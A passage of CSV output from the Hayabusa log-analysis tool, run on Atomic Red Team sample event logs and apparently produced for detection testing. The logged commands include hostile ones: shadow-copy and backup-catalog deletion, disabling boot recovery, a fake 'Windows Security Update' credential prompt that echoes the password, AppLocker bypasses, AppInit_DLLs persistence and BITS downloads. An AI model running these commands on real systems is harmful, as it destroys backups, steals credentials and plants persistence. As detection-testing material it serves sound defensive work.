""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 
23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 
23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library 
C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll : Path: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 
23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
-2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe delete shadows /all /quiet : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe delete catalog -quiet : Path: C:\Windows\System32\wbadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe"" : Path: C:\Windows\System32\wbengine.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe : Path: C:\Windows\System32\vds.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot 
Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} recoveryenabled no : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground 
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /create AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md 
C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:30.900 